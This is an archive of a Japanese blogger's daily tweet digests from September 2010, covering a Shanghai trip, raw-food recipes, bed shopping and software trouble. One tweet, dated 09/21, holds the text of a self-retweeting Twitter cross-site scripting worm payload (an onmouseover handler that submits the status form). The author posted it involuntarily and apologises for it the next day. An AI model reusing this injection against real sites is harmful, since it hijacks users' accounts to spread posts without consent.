2010年09月30日

2010年09月29日のつぶやき

tomoishizuka / 石塚とも
だ、脱力……(スペザーノ博士のパートナーシップのワーク、もろにきいてる)>関係者各位。 at 09/29 23:18

tomoishizuka / 石塚とも
2010上海(おまけ)・この荷物の軽さはいったい何なんだろう? | http://rawbeauty.seesaa.net/article/164149469.html at 09/29 19:33

tomoishizuka / 石塚とも
上海2010秋・2(欧米ナイズされたカフェとホテルで作ってくれたお弁当) | http://rawbeauty.seesaa.net/article/164111324.html at 09/29 11:22

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月29日

2010年09月28日のつぶやき

tomoishizuka / 石塚とも
ふと、使っていたボールペンのインクがでなくなる。「おや」と思って分解してみたら、なんと、インクを全部使いきっている! 万年筆ならいざ知らず、ボールペン使い切るなんて人生で初めての体験だ。uni のジェットストリーム、あまりの使いやすさにこればかり使ってきたからなあ。 at 09/28 11:28


posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月28日

2010年09月27日のつぶやき

tomoishizuka / 石塚とも
往路は茨城空港から。出発ロビーで売っていた梨の直売、丸ごとは検疫を通れないので、試食用にカットされたものを2個分譲ってもらってゲートをくぐったら、カットフルーツは「菓子」と判断されたのか難なくスルー。帰りは成田から直接京橋の試写室へ。ミヒャエル・ハネケの新作を見た後元気に帰宅。 at 09/27 19:26

tomoishizuka / 石塚とも
@mamiraw 上海より帰宅。あとでブログにもアップするけど、日本人ビジネス街のカフェのビッグサラダ、おすすめよ〜 ちなみに中国でtwitter, youtube, ameblo, blogger, Fc2は見られません。seesaa は見られるよ〜 at 09/27 19:24

tomoishizuka / 石塚とも
上海ではおいしいものがいっぱいでちょっとはめはずしちゃった。。。(加熱素食や朝食ビュッフェのマフィンやチーズなど)。そして、今日は朝のホテル、浦東空港、機内、成田、そして我が家と5か所にそれはそれは立派な置き土産を。私、マーキングする犬ですかorz at 09/27 19:09

tomoishizuka / 石塚とも
2泊3日の上海。あまり旅行に出ない私だけど、ときには物理的に遠く離れることのパワーを感じた。自分の立ち位置を視線を変えて俯瞰することができた。それにしても、映画も食事もなくほっといてくれる格安エアライン、春秋航空、ビバ! 英単語いっぱい勉強しちゃった。 at 09/27 19:04

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月27日

2010年09月26日のつぶやき

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月26日

2010年09月25日のつぶやき

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月25日

2010年09月24日のつぶやき

tomoishizuka / 石塚とも
@mamiraw 土日だけ。月曜日に帰ってきちゃう。ブログの素食レストランおすすめです。ぜひ行ってみて!彼女のブログに上海ベジ情報たくさんあります。http://rarirurerawfood.seesaa.net/ at 09/24 20:45


tomoishizuka / 石塚とも
@mamiraw 私も明日から行くんですけど。。。 at 09/24 19:57

tomoishizuka / 石塚とも
正義のないところに居場所があるから | http://rawbeauty.seesaa.net/article/163614732.html at 09/24 13:06

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月24日

2010年09月23日のつぶやき

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月23日

2010年09月22日のつぶやき

tomoishizuka / 石塚とも
この季節になんですが、スキーウェア欲しい人いませんか。。。(買っても安いものだけどねえ、今)詳細はメッセください。メッセがフォロワーじゃないと受け取れない設定になっているらしいので、返事がなかったらツイートしてください。 at 09/22 18:41

tomoishizuka / 石塚とも
我は霊に満ち足り I am spirit テリヤキ・アーモンド | http://rawbeauty.seesaa.net/article/163382904.html at 09/22 08:29

tomoishizuka / 石塚とも
昨晩9時ごろ、変なスパンツイートにやられてしまいました。(自動的にりツイートされる爆弾が入っており、私は何もしていません)これを見た方は自動的に同じことが起こってしまったと思います。不可抗力でしたがご迷惑をかけたことをお詫びします。 at 09/22 04:54

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月22日

2010年09月21日のつぶやき

tomoishizuka / 石塚とも
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/ at 09/21 21:40

tomoishizuka / 石塚とも
「人を愛すると、人は愛した証拠を残したくなる。だから、犯罪に愛がからんだとき、完全犯罪というのはありえない」『死刑台のエレベーター』柄本明の刑事役って相変わらずいいねえ。http://www.shikeidai.jp/index.html at 09/21 16:58

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月21日

2010年09月20日のつぶやき

tomoishizuka / 石塚とも
お待たせ! chihiroさんとダーリンさんの赤ちゃん更新しましたよー http://rawbeauty.seesaa.net/article/163254055.html at 09/20 22:06

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月20日

2010年09月19日のつぶやき

tomoishizuka / 石塚とも
お墓参り→かっぱ橋商店街→某自動車会ショールームへ。買い替え時期は決まっているのでさすがにその場で買いませんでしたが、かなり決定に近いムード。父、超ご機嫌(車好き)で帰宅が長引きあやうく低血糖になるところだった。 at 09/19 17:46

tomoishizuka / 石塚とも
かっぱ橋商店街。小さな製菓材料に強い店1軒にて、口がね、ケーキの丸型、キャベツが千切りで切るプロ用大型ピーラー、パレットナイフなど、盛り付けを美しくするための道具を買う。嬉しい。 at 09/19 17:42

tomoishizuka / 石塚とも
お墓参りの帰りにかっぱ橋商店街に回ってもらった。日曜日で開いている店はわずかだったけど、全部開いてたらすごい情報量だろうから、あれぐらい(ほんとにわずか)ちょうど良かった気がする。 at 09/19 17:37

tomoishizuka / 石塚とも
お墓参り行ってきたなう。お線香を買う時(外側の巻紙が)「ピンクと紫」を絶対に指定する父の心理やいかに。さすがに違ってもきれなくなりましたけど。 at 09/19 17:32

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月19日

2010年09月18日のつぶやき

tomoishizuka / 石塚とも
平床。90にしようと決めてサポートセンターさくらに電話しようと思ったら、本日臨時休業orz 注文は連休明けですね。それまでもうちょっと情報収集。 at 09/18 12:26

tomoishizuka / 石塚とも
@rawmum 写真、ヴィクトリアさんに送ってあげれば?w  at 09/18 12:02

tomoishizuka / 石塚とも
@philia0101 ご意見ありがとうございます〜。「ぴたっ」の感覚って、母がガンで入院していた時病院の折りたたみベッドで毎日寝ていたのが妙に気持ち良かった(ふわふわしないし、家よりプライバシーがあった。いったいどんな家だ)感覚の名残なんだろうな。 at 09/18 11:49

tomoishizuka / 石塚とも
平床についていろいろ調べていたら、西式で使うかまぼこ型の硬枕、解剖室で死体を置くのに使うほど安定性があるそうな。それじゃ絶対に寝返り打たないわね。。。http://oshiete.homes.jp/qa846082.html at 09/18 11:46

tomoishizuka / 石塚とも
@rawmum  見た目もデザインも90の方がお得なのに、あの「棺桶」みたいな幅に「ぴたっ」とおさまって寝てみたいという衝動が(・・〜。 明日夕方病院に行って、写真とったらアップしますね。 at 09/18 11:44

tomoishizuka / 石塚とも
平床が何カ月も買えずにいるのは、60幅にするか90幅にするかずーっと悩んでるから。寝るだけなら60で十分な気がする。軽いし。でも90だと値段は同じだし、ベットの上にすっぽりのっけちゃっておける。どっちが便利かな? at 09/18 10:53

tomoishizuka / 石塚とも
今、ダーリンさんから電話かかってきた「女の子お生まれになったんですね」「ど、どうして知ってるんですか?!」「だって本人 @onakanonakami ツイートしてるし」w。 うちの近所の病院なので、明日赤ちゃん見に行ってきまーす♪ ブログの掲載許可済み。 at 09/18 10:44

tomoishizuka / 石塚とも
昨日まで数日連続でローカカオ入りのフラペチーノ飲んでたけど、数日続けるとちゃんと飽きる。ローになってから間違いなくカカオに影響されない人になってる。昔はチョコドリンクとヨーグルトドリンクがあったらヨーグルトを選ぶことなんてなかった気がする。 at 09/18 09:10

tomoishizuka / 石塚とも
バナナ、ブルーベリー、ラズベリー、サラダグリーン一つかみ、アーモンドミルク、氷でスムージー作ったら、味がかぎりなくフローズン・ヨーグルトに近い。おいしー。 at 09/18 09:05

tomoishizuka / 石塚とも
bot って勝手に作っていいんですか? #bot チャック・スペザーノ博士のbot 作っちゃおうかしら。 at 09/18 07:44

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月18日

2010年09月17日のつぶやき

tomoishizuka / 石塚とも
@rmbthelemon あ〜れ〜 どういう流れだったんだかね〜 あのアセンションはすごかったね〜 at 09/17 19:12

tomoishizuka / 石塚とも
@onakanonakami 出産おめでとう! at 09/17 19:04

tomoishizuka / 石塚とも
@rmbthelemon 公開ツイートでお尋ねするのもなんですがw、私、今朝の電話でどういう流れであんな重要なことに気がついたんだっけ? at 09/17 18:11

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月17日

2010年09月16日のつぶやき

tomoishizuka / 石塚とも
我は感謝せり 〜I am grateful〜 カフェ・グラティチュードのレシピとライフスタイル | http://rawbeauty.seesaa.net/article/162857019.html at 09/16 20:37

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月16日

2010年09月15日のつぶやき

tomoishizuka / 石塚とも
夏休み頑張ったリワード。昨日までこんなもんかいと思っていたが、実はとんでもなく大きいかもしれない。 at 09/15 20:29

tomoishizuka / 石塚とも
昨日、ちょいと打ちどころが悪くて思わず己敬堂さん @kokeidou257 に泣きべそ……。ところが本日、とんでもない急展開。いやー、たしかにドラマよりクリエイティビティだよね、人生は(つまり過去のデータ=ストーリーを壊せ)。Stay hungry, Stay foolish. at 09/15 20:26

tomoishizuka / 石塚とも
ロービューティジャパン・フィニッシング・スクール構想2 | http://rawbeauty.seesaa.net/article/162726667.html at 09/15 14:33

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月15日

2010年09月14日のつぶやき

tomoishizuka / 石塚とも
ロービューティジャパン・フィニッシング・スクール構想 | http://rawbeauty.seesaa.net/article/162643394.html at 09/14 19:01

tomoishizuka / 石塚とも
週刊金曜日「大奥」責了しました。金曜日発売です。おもしろいのでぜひお手に取ってみてください。 at 09/14 18:46

tomoishizuka / 石塚とも
「もっといいもの」を見つけたら、人は、「前にもってたいいもの」には二度と帰らない。 at 09/14 18:18

tomoishizuka / 石塚とも
この数年間「ローフード・フォー・ビジー・ピープル」に助けられて、料理の時間は最小限にして人生のお片づけにまい進してきたけど、やっと調理をゆっくりできる次のフェーズに入ってきたみたいだ。 at 09/14 12:42

tomoishizuka / 石塚とも
日曜日と月曜日、結構時間をかけてローカフェめしのプレパレーションした。6点ぐらいかな? 時間はかかったけど、火曜日の今となっては、ずーっとおいしいものが食べられて、しかも冷蔵庫からさっと取り出せて、結果的には満足感が高い。 at 09/14 12:41

tomoishizuka / 石塚とも
Tokyo raw girls に行けなかった夜、私は西麻布で大人になっていた。 at 09/14 08:27

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月14日

2010年09月13日のつぶやき

tomoishizuka / 石塚とも
りインストールであっさり解決 #sugarsync でも、先日からつながったりだめだったりなのでまだ油断はできない。何かがコンフリクトしているのかしら? at 09/13 13:57

tomoishizuka / 石塚とも
#sugarsync 、だめなのはうちだけみたい。今日、実家で同期状況を見たらOKだった。あちらでこちらのファイルが取り出せないため、早退して西麻布で原稿を書いている。年間140ドルで、一番使いたかった日に使えなかったのは…。先ほどサポートにメール。インストもしなおすつもり。 at 09/13 13:55

tomoishizuka / 石塚とも
昨晩、我が家の食卓が突然ロー・カフェになった | http://rawbeauty.seesaa.net/article/162489323.html at 09/13 13:08

tomoishizuka / 石塚とも
土曜日にIKEAで買ったもの。Rationell Variera シェルフインサート 大、小それぞれ1個ずつ。重ねてねじ止めできる安定性が心憎い。http://www.ikea.com/jp/ja/catalog/products/50177727 at 09/13 07:40

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月13日

2010年09月12日のつぶやき

tomoishizuka / 石塚とも
段ボーる箱の下からキッチンバサミ発見。。 at 09/12 17:51

tomoishizuka / 石塚とも
Someone uses #sugarsync . I can't connect to it since few days ago. Double clicking the icon, it doesn't start up. Anyone same problem? at 09/12 07:36

tomoishizuka / 石塚とも
#sugarsync お使いの方。数日前から、接続されません。sugarsync マネージャーを起動しても立ち上がりません。私だけでしょうか。ご意見お願いします。 at 09/12 07:02

tomoishizuka / 石塚とも
昨日IKEAに行ったのに、出てきたときにまったく疲れを感じなかった。全体的な集中力も上がっている。mami さんが「ローよりすごい」といってもってきたミネラル水のせいの可能性あり。もうちょっと様子見。 at 09/12 06:56

tomoishizuka / 石塚とも
@yonecho 確実に手に入れるのもいいのですが、お店にある=みんなの目に触れて、さらに誰かが買っているところが他の人の目に触れるのもいいんじゃないかと思います。 at 09/12 06:48

tomoishizuka / 石塚とも
@sssumasato ツイットしまくっているのでどれぐらいはまってるか見えてるかと(笑)。本当にずーっときになってた作品だったので、今回見れてすっとしましたw  at 09/12 06:47

tomoishizuka / 石塚とも
@nocaco manna のパーティの写真ですか? ありがとうございます。 at 09/12 06:45

tomoishizuka / 石塚とも
@riezo_7 @hayamayaya キッチンバサミ、ないです。。。キッチンツールとしてはしばしば包丁より大切なのよね。アントニオ神父様もお願いします。。。 at 09/12 06:41

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月12日

2010年09月11日のつぶやき

tomoishizuka / 石塚とも
ピーター・ドラッカーが「成果をあげる人とあげない人の差は才能ではない。いくつかの習慣的な姿勢と、基礎的な方法を身につけているかどうかの問題である。」っていってるとすると、やっぱり人生って「積み重ね」なのね。。。(コア・ビリーブだけは積み重ねっていうより変革の連続だけどね) at 09/11 22:38

tomoishizuka / 石塚とも
『大奥』『大奥』連呼してたら、記事書けることになった。普段は順番がきつくてなかなか一コマとれないのだ。ついてる&ありがとう♪ at 09/11 22:06

tomoishizuka / 石塚とも
小人さん小人さん、私のキッチンバサミを返してください。。。 at 09/11 21:54

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

2010年09月11日

2010年09月10日のつぶやき

tomoishizuka / 石塚とも
まごころおそうじシェアその3 #spaceclearing | http://rawbeauty.seesaa.net/article/162177546.html at 09/10 22:19

tomoishizuka / 石塚とも
「ローフードを食べて元気になった人のための英語教室」終了したらロースイーツふるまう機会がなくなってつまらない。教室開くのは私の「ロースイーツみんなに食べさせたい欲」が高まってきたときととリンクかも(笑) at 09/10 20:54

tomoishizuka / 石塚とも
今初めてワードのインデント機能を使って原稿を書いていて、頭の中の整理しやすさに愕然としている。ワープロソフトのインデント機能については15年も前から知っていたのに。今までごちゃごちゃの中にいたかったのだ、という自覚をほのかに感じる。 at 09/10 13:08

posted by 石とも at 00:01| 日記 | このブログの読者になる | 更新情報をチェックする

広告


この広告は60日以上更新がないブログに表示がされております。

以下のいずれかの方法で非表示にすることが可能です。

・記事の投稿、編集をおこなう
・マイブログの【設定】 > 【広告設定】 より、「60日間更新が無い場合」 の 「広告を表示しない」にチェックを入れて保存する。


×

